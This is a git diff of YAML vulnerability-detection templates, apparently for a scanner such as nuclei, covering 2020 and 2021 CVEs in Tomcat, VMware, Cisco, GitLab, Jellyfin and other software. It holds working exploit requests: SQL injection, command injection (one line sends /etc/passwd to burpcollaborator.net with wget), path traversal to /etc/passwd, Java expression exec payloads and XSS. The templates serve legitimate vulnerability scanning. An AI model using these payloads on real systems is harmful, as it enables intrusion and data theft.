diff --git a/cves/2020/CVE-2020-9425.yaml b/cves/2020/CVE-2020-9425.yaml
index 2c0b8fcc55..9daed3727e 100644
--- a/cves/2020/CVE-2020-9425.yaml
+++ b/cves/2020/CVE-2020-9425.yaml
@@ -3,7 +3,10 @@ info:
name: rConfig Unauthenticated Sensitive Information Disclosure
author: madrobot
severity: high
- reference: https://nvd.nist.gov/vuln/detail/CVE-2020-9425
+ description: An issue was discovered in includes/head.inc.php in rConfig before 3.9.4. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application was not exiting after a redirect is applied, the rest of the page still executed, resulting in the disclosure of cleartext credentials in the response.
+ reference: |
+ - https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153
+ - https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9
tags: cve,cve2020,rconfig
requests:
diff --git a/cves/2020/CVE-2020-9483.yaml b/cves/2020/CVE-2020-9483.yaml
new file mode 100644
index 0000000000..e0017d5eda
--- /dev/null
+++ b/cves/2020/CVE-2020-9483.yaml
@@ -0,0 +1,38 @@
+id: CVE-2020-9483
+
+info:
+ name: SkyWalking SQLI
+ author: pikpikcu
+ severity: high
+ description: |
+ When use H2/MySQL/TiDB as Apache SkyWalking storage, the metadata query through GraphQL protocol, there is a SQL injection vulnerability, which allows to access unpexcted data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters.
+ reference: https://github.com/apache/skywalking/pull/4639
+ tags: cve,cve2020,sqli,skywalking
+
+requests:
+ - method: POST
+ path:
+ - "{{BaseURL}}/graphql"
+ headers:
+ Content-Type: application/json
+ body: |
+ {"query":"query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\"all_p99\",id:\"') UNION SELECT 1,CONCAT('~','9999999999','~')-- \",}, duration: $d){values{value}}}","variables":{"d":{"start":"2021-11-11","end":"2021-11-12","step":"DAY"}}}
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "Content-Type: application/json"
+ part: header
+
+ - type: word
+ words:
+ - "UNION SELECT 1,CONCAT('~','9999999999','~')--"
+ - 'Exception while fetching data'
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2020/CVE-2020-9484.yaml b/cves/2020/CVE-2020-9484.yaml
index 4b613fda55..4765190c8e 100644
--- a/cves/2020/CVE-2020-9484.yaml
+++ b/cves/2020/CVE-2020-9484.yaml
@@ -4,8 +4,16 @@ info:
name: Apache Tomcat RCE by deserialization
author: dwisiswant0
severity: high
- description: Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server
+ description: |
+ When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if
+ a) an attacker is able to control the contents and name of a file on the server; and
+ b) the server is configured to use the PersistenceManager with a FileStore; and
+ c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and
+ d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control.
+ Note that all of conditions a) to d) must be true for the attack to succeed.
tags: cve,cve2020,apache
+ reference:
+ - http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html
requests:
- method: GET
diff --git a/cves/2020/CVE-2020-9490.yaml b/cves/2020/CVE-2020-9490.yaml
new file mode 100644
index 0000000000..b0ccf8e655
--- /dev/null
+++ b/cves/2020/CVE-2020-9490.yaml
@@ -0,0 +1,24 @@
+id: CVE-2020-9490
+
+info:
+ name: CVE-2020-9490
+ severity: medium
+ description: Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers.
+ author: philippedelteil
+ tags: cve,cve2020,apache,dos
+ reference: |
+ - https://httpd.apache.org/security/vulnerabilities_24.html
+ - https://bugs.chromium.org/p/project-zero/issues/detail?id=2030
+ - https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=443369
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-9490
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers:
+ - type: regex
+ regex:
+ - "Apache/2\\.4\\.([3-3][0-9]|2[0-9]|4[0-3])"
+ part: header
diff --git a/cves/2020/CVE-2020-9496.yaml b/cves/2020/CVE-2020-9496.yaml
index f8ae6b62ba..bf637b1ef7 100644
--- a/cves/2020/CVE-2020-9496.yaml
+++ b/cves/2020/CVE-2020-9496.yaml
@@ -6,6 +6,9 @@ info:
severity: medium
description: XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03
tags: cve,cve2020,apache
+ reference:
+ - http://packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html
+ - http://packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.html
# This template detects a Java deserialization vulnerability in Apache
diff --git a/cves/2020/CVE-2020–26073.yaml b/cves/2020/CVE-2020–26073.yaml
deleted file mode 100644
index 3b06a803ef..0000000000
--- a/cves/2020/CVE-2020–26073.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: CVE-2020–26073
-info:
- name: Cisco SD-WAN vManage Software Directory Traversal
- author: madrobot
- severity: high
- reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020–26073
- tags: Directory Traversal
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: regex
- words:
- - "root:[x*]:0:0:"
- part: body
diff --git a/cves/2021/CVE-2021-1497.yaml b/cves/2021/CVE-2021-1497.yaml
new file mode 100644
index 0000000000..905a7a7455
--- /dev/null
+++ b/cves/2021/CVE-2021-1497.yaml
@@ -0,0 +1,40 @@
+id: CVE-2021-1497
+
+info:
+ name: Cisco HyperFlex HX Data Platform RCE
+ description: Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
+ author: gy741
+ severity: critical
+ reference: |
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-1497
+ - https://attackerkb.com/topics/mDqlWhQovO/cve-2021-1497
+ - https://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html
+ - https://twitter.com/cycatz2/status/1394615546935529472
+ - https://twitter.com/Unit42_Intel/status/1402655493735206915
+ - https://twitter.com/ptswarm/status/1390300625129201664
+ - https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution
+ - https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md
+ tags: cve,cve2021,cisco,rce,oob
+
+requests:
+ - raw:
+ - |
+ POST /storfs-asup HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+ Accept: */*
+ Content-Length: 78
+ Content-Type: application/x-www-form-urlencoded
+
+ action=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "http"
diff --git a/cves/2021/CVE-2021-21234.yaml b/cves/2021/CVE-2021-21234.yaml
new file mode 100644
index 0000000000..d6e37c4243
--- /dev/null
+++ b/cves/2021/CVE-2021-21234.yaml
@@ -0,0 +1,24 @@
+id: CVE-2021-21234
+
+info:
+ name: Spring Boot Actuator Logview - Directory Traversal
+ author: gy741
+ severity: high
+ reference: https://blogg.pwc.no/styringogkontroll/unauthenticated-directory-traversal-vulnerability-in-a-java-spring-boot-actuator-library-cve-2021-21234
+ tags: cve,cve2021,springboot,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/log/view?filename=/etc/passwd&base=../../"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-21307.yaml b/cves/2021/CVE-2021-21307.yaml
new file mode 100644
index 0000000000..e815a8471b
--- /dev/null
+++ b/cves/2021/CVE-2021-21307.yaml
@@ -0,0 +1,93 @@
+id: CVE-2021-21307
+
+info:
+ name: Remote Code Exploit in Lucee Admin
+ author: dhiyaneshDk
+ severity: critical
+ description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development. In Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 there is an unauthenticated remote code exploit. This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, one can block access to the Lucee Administrator.
+ reference: |
+ - https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r
+ - https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-21307
+ tags: cve,cve2021,rce,lucee,adobe
+
+requests:
+ - raw:
+ - |
+ POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Connection: close
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 8
+
+ imgSrc=a
+ - |
+ POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Content-Type: application/x-www-form-urlencoded
+ Content-Length: 790
+
+ imgSrc=
+
+
+
+
+
+
+
+
+
+
+
+ #HTMLCodeFormat(myVar)#
+
+
+
+ - |
+ POST /lucee/{{randstr}}.cfm HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+ Content-Type: application/x-www-form-urlencoded
+
+ cmd=id&opts=&timeout=5
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "uid="
+ - "gid="
+ - "groups="
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ regex:
+ - "(u|g)id=.*"
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-21315.yaml b/cves/2021/CVE-2021-21315.yaml
new file mode 100644
index 0000000000..bda757469c
--- /dev/null
+++ b/cves/2021/CVE-2021-21315.yaml
@@ -0,0 +1,37 @@
+id: CVE-2021-21315
+
+info:
+ name: Node.js Systeminformation Command Injection
+ author: pikpikcu
+ severity: high
+ description: The System Information Library for Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information. In systeminformation before version 5.3.1 there is a command injection vulnerability. Problem was fixed in version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected.
+ reference: |
+ - https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
+ - https://security.netapp.com/advisory/ntap-20210312-0007/
+ tags: nodejs,cve,cve2021
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20burpcollaborator.net)"
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "application/json"
+ part: header
+
+ - type: word
+ words:
+ - "wget --post-file /etc/passwd burpcollaborator.net"
+ - name
+ - running
+ - pids
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-21389.yaml b/cves/2021/CVE-2021-21389.yaml
new file mode 100644
index 0000000000..8470485e9e
--- /dev/null
+++ b/cves/2021/CVE-2021-21389.yaml
@@ -0,0 +1,49 @@
+id: CVE-2021-21389
+
+info:
+ name: BuddyPress REST API Privilege Escalation to RCE
+ author: lotusdll
+ severity: critical
+ description: The BuddyPress WordPress plugin was affected by an REST API Privilege Escalation to RCE
+ reference: |
+ - https://github.com/HoangKien1020/CVE-2021-21389
+ - https://buddypress.org/2021/03/buddypress-7-2-1-security-release/
+ - https://codex.buddypress.org/releases/version-7-2-1/
+ - https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3
+ tags: cve,cve2021,wordpress,wp-plugin,rce
+
+
+requests:
+ - raw:
+ - |
+ POST /wp-json/buddypress/v1/signup HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
+ Content-Type: application/json; charset=UTF-8
+
+ {
+ "user_login":"{{randstr}}",
+ "password":"{{randstr}}",
+ "user_name":"{{randstr}}",
+ "user_email":"{{randstr}}@example.com"
+ }
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "application/json"
+ part: header
+
+ - type: word
+ words:
+ - "user_login"
+ - "registered"
+ - "activation_key"
+ - "user_email"
+ part: body
+ condition: and
diff --git a/cves/2021/CVE-2021-21402.yaml b/cves/2021/CVE-2021-21402.yaml
new file mode 100644
index 0000000000..816303d5e5
--- /dev/null
+++ b/cves/2021/CVE-2021-21402.yaml
@@ -0,0 +1,31 @@
+id: CVE-2021-21402
+
+info:
+ name: Jellyfin prior to 10.7.0 Unauthenticated Arbitrary File Read
+ author: dwisiswant0
+ severity: high
+ description: |
+ Jellyfin allows unauthenticated arbitrary file read. This issue is more prevalent when
+ Windows is used as the host OS. Servers that are exposed to the public Internet are
+ potentially at risk. This is fixed in version 10.7.1.
+ reference: https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/
+ tags: cve,cve2021,jellyfin,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"
+ - "{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "Content-Type: application/octet-stream"
+ part: header
+ - type: regex
+ regex:
+ - "\\[(font|extension|file)s\\]"
+ part: body
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-21479.yaml b/cves/2021/CVE-2021-21479.yaml
new file mode 100644
index 0000000000..5d60f46f48
--- /dev/null
+++ b/cves/2021/CVE-2021-21479.yaml
@@ -0,0 +1,26 @@
+id: CVE-2021-21479
+
+info:
+ name: SCIMono < v0.0.19 Remote Code Execution
+ author: dwisiswant0
+ severity: critical
+ reference: https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/
+ description: |
+ In SCIMono before 0.0.19, it is possible for an attacker to inject and
+ execute java expression compromising the availability and integrity of the system.
+ tags: cve,cve2021,scimono,rce
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"
+
+ matchers:
+ - type: word
+ words:
+ - "The attribute value"
+ - "java.lang.UNIXProcess@"
+ - "has invalid value!"
+ - '"status" : "400"'
+ part: body
+ condition: and
diff --git a/cves/2021/CVE-2021-21801.yaml b/cves/2021/CVE-2021-21801.yaml
new file mode 100644
index 0000000000..338eccbd88
--- /dev/null
+++ b/cves/2021/CVE-2021-21801.yaml
@@ -0,0 +1,32 @@
+id: CVE-2021-21801
+
+info:
+ name: Advantech R-SeeNet graph parameter - Reflected Cross-Site Scripting (XSS)
+ author: gy741
+ severity: medium
+ description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.
+ reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
+ tags: cve,cve2021,r-seenet,xss
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '"zlo onerror=alert(1) "'
+ - 'Device Status Graph'
+ part: body
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-21802.yaml b/cves/2021/CVE-2021-21802.yaml
new file mode 100644
index 0000000000..a3eeb5f61e
--- /dev/null
+++ b/cves/2021/CVE-2021-21802.yaml
@@ -0,0 +1,32 @@
+id: CVE-2021-21802
+
+info:
+ name: Advantech R-SeeNet device_id parameter - Reflected Cross-Site Scripting (XSS)
+ author: gy741
+ severity: medium
+ description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.
+ reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
+ tags: cve,cve2021,r-seenet,xss
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '"zlo onerror=alert(1) "'
+ - 'Device Status Graph'
+ part: body
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-21803.yaml b/cves/2021/CVE-2021-21803.yaml
new file mode 100644
index 0000000000..93a8fcf35e
--- /dev/null
+++ b/cves/2021/CVE-2021-21803.yaml
@@ -0,0 +1,32 @@
+id: CVE-2021-21803
+
+info:
+ name: Advantech R-SeeNet is2sim parameter - Reflected Cross-Site Scripting (XSS)
+ author: gy741
+ severity: medium
+ description: This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.
+ reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1272
+ tags: cve,cve2021,r-seenet,xss
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '"zlo onerror=alert(1) "'
+ - 'Device Status Graph'
+ part: body
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-21816.yaml b/cves/2021/CVE-2021-21816.yaml
new file mode 100644
index 0000000000..e8df776430
--- /dev/null
+++ b/cves/2021/CVE-2021-21816.yaml
@@ -0,0 +1,28 @@
+id: CVE-2021-21816
+
+info:
+ name: D-LINK DIR-3040 - Syslog Information Disclosure
+ description: An information disclosure vulnerability exists in the Syslog functionality of D-LINK DIR-3040 1.13B03. A specially crafted network request can lead to the disclosure of sensitive information. An attacker can send an HTTP request to trigger this vulnerability.
+ author: gy741
+ severity: medium
+ reference: https://talosintelligence.com/vulnerability_reports/TALOS-2021-1281
+ tags: cve,cve2021,dlink,exposure,router
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/messages"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "syslog:"
+ - "admin"
+ - "/etc_ro/lighttpd/www"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-21972.yaml b/cves/2021/CVE-2021-21972.yaml
new file mode 100644
index 0000000000..9b852d57e9
--- /dev/null
+++ b/cves/2021/CVE-2021-21972.yaml
@@ -0,0 +1,28 @@
+id: CVE-2021-21972
+
+info:
+ name: VMware vCenter Unauthenticated RCE
+ author: dwisiswant0
+ severity: critical
+ reference: https://swarm.ptsecurity.com/unauth-rce-vmware/
+ description: The vulnerability allows unauthenticated remote attackers to upload file leading to remote code execution (RCE). This templates only detects the plugin.
+ tags: cve,cve2021,vmware,rce
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/ui/vropspluginui/rest/services/getstatus"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "VSPHERE-UI-JSESSIONID"
+ part: header
+ condition: and
+ - type: regex
+ regex:
+ - "(Install|Config) Final Progress"
+ part: body
diff --git a/cves/2021/CVE-2021-21975.yaml b/cves/2021/CVE-2021-21975.yaml
new file mode 100644
index 0000000000..92ba471ccb
--- /dev/null
+++ b/cves/2021/CVE-2021-21975.yaml
@@ -0,0 +1,32 @@
+id: CVE-2021-21975
+
+info:
+ name: vRealize Operations Manager API SSRF (VMWare Operations)
+ author: luci
+ severity: critical
+ description: A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials or trigger Remote Code Execution using CVE-2021-21983.
+ tags: cve,cve2021,ssrf,vmware,vrealize
+ reference: https://www.vmware.com/security/advisories/VMSA-2021-0004.html
+
+requests:
+ - raw:
+ - |
+ POST /casa/nodes/thumbprints HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json;charset=UTF-8
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+
+ ["127.0.0.1:443/ui/"]
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'vRealize Operations Manager'
+ - 'thumbprint'
+ - 'address'
+ condition: and
+ part: body
+ - type: status
+ status:
+ - 200
diff --git a/cves/2021/CVE-2021-21978.yaml b/cves/2021/CVE-2021-21978.yaml
new file mode 100644
index 0000000000..396c5b2fbc
--- /dev/null
+++ b/cves/2021/CVE-2021-21978.yaml
@@ -0,0 +1,44 @@
+id: CVE-2021-21978
+
+info:
+ name: VMware View Planner Unauthenticated RCE
+ author: dwisiswant0
+ severity: critical
+ reference: https://twitter.com/osama_hroot/status/1367258907601698816
+ description: |
+ This template detects an VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability.
+ Improper input validation and lack of authorization leading to arbitrary file upload in logupload web application.
+ An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted
+ file leading to remote code execution within the logupload container.
+ tags: cve,cve2021,vmware,rce
+
+requests:
+ - raw:
+ - |
+ POST /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
+ Accept: text/html
+ Referer: {{BaseURL}}
+ Connection: close
+
+ ------WebKitFormBoundarySHHbUsfCoxlX1bpS
+ Content-Disposition: form-data; name="logfile"; filename=""
+ Content-Type: text/plain
+
+ POC_TEST
+
+ ------WebKitFormBoundarySHHbUsfCoxlX1bpS
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "File uploaded successfully."
+ part: body
+ - type: dsl
+ dsl:
+ - "len(body) == 28" # length of "\nFile uploaded successfully."
\ No newline at end of file
diff --git a/cves/2021/CVE-2021-21985.yaml b/cves/2021/CVE-2021-21985.yaml
new file mode 100644
index 0000000000..5271910e78
--- /dev/null
+++ b/cves/2021/CVE-2021-21985.yaml
@@ -0,0 +1,31 @@
+id: CVE-2021-21985
+
+info:
+ name: VMware vSphere Client (HTML5) RCE
+ author: D0rkerDevil
+ severity: critical
+ description: |
+ The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.
+ reference: |
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-21985
+ - https://www.vmware.com/security/advisories/VMSA-2021-0010.html
+ - https://github.com/alt3kx/CVE-2021-21985_PoC
+ tags: cve,cve2021,rce,vsphere
+
+requests:
+ - raw:
+ - |
+ POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Content-Type: application/json
+ Content-Length: 86
+ Connection: close
+
+ {"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}
+
+ matchers:
+ - type: word
+ words:
+ - '{"result":{"isDisconnected":'
+ part: body
diff --git a/cves/2021/CVE-2021-22122.yaml b/cves/2021/CVE-2021-22122.yaml
index e050c2c9fc..213b811b3d 100644
--- a/cves/2021/CVE-2021-22122.yaml
+++ b/cves/2021/CVE-2021-22122.yaml
@@ -4,6 +4,11 @@ info:
name: FortiWeb v6.3.x-6.2.x Unauthenticated XSS
author: dwisiswant0
severity: medium
+ description: An improper neutralization of input during web page generation in FortiWeb GUI interface 6.3.0 through 6.3.7 and version before 6.2.4 may allow an unauthenticated, remote attacker to perform a reflected cross site scripting attack (XSS) by injecting malicious payload in different vulnerable API end-points.
+ reference: |
+ - https://www.fortiguard.com/psirt/FG-IR-20-122
+ - https://twitter.com/ptswarm/status/1357316793753362433
+
tags: cve,cve2021,fortiweb,xss
# FortiWeb GUI interface may allow an unauthenticated, remote attacker
@@ -18,6 +23,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/error3?msg=30&data=';alert('nuclei');//"
+ - "{{BaseURL}}/omni_success?cmdb_edit_path=\");alert('nuclei');//"
matchers-condition: and
matchers:
- type: word
@@ -25,4 +31,4 @@ requests:
- "nuclei"
- "No policy has been chosen."
condition: and
- part: body
\ No newline at end of file
+ part: body
diff --git a/cves/2021/CVE-2021-22214.yaml b/cves/2021/CVE-2021-22214.yaml
new file mode 100644
index 0000000000..9fec2f32b0
--- /dev/null
+++ b/cves/2021/CVE-2021-22214.yaml
@@ -0,0 +1,30 @@
+id: CVE-2021-22214
+
+info:
+ author: Suman_Kar
+ name: Unauthenticated Gitlab SSRF - CI Lint API
+ severity: medium
+ description: When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab CE/EE affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is limited.
+ reference: |
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-22214
+ - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
+ - https://docs.gitlab.com/ee/api/lint.html
+ tags: cve,cve2021,gitlab,ssrf,oob
+
+requests:
+ - raw:
+ - |
+ POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
+ Referer: {{BaseURL}}
+ content-type: application/json
+ Connection: close
+
+ {"content": "include:\n remote: http://{{interactsh-url}}/api/v1/targets?test.yml"}
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "http"
diff --git a/cves/2021/CVE-2021-22873.yaml b/cves/2021/CVE-2021-22873.yaml
index b4a5e3668a..3f725a6db8 100644
--- a/cves/2021/CVE-2021-22873.yaml
+++ b/cves/2021/CVE-2021-22873.yaml
@@ -6,7 +6,7 @@ info:
severity: low
description: Revive Adserver before 5.1.0 is vulnerable to open redirects via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts.
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-22873
- tags: cve,cve2021,rediect
+ tags: cve,cve2021,redirect
requests:
- method: GET
diff --git a/cves/2021/CVE-2021-22986.yaml b/cves/2021/CVE-2021-22986.yaml
new file mode 100644
index 0000000000..bf2d922d36
--- /dev/null
+++ b/cves/2021/CVE-2021-22986.yaml
@@ -0,0 +1,52 @@
+id: CVE-2021-22986
+info:
+ name: F5 BIG-IP iControl REST unauthenticated RCE
+ author: rootxharsh,iamnoooob
+ severity: critical
+ tags: bigip,cve,cve2021,rce
+ description: The iControl REST interface has an unauthenticated remote command execution vulnerability.
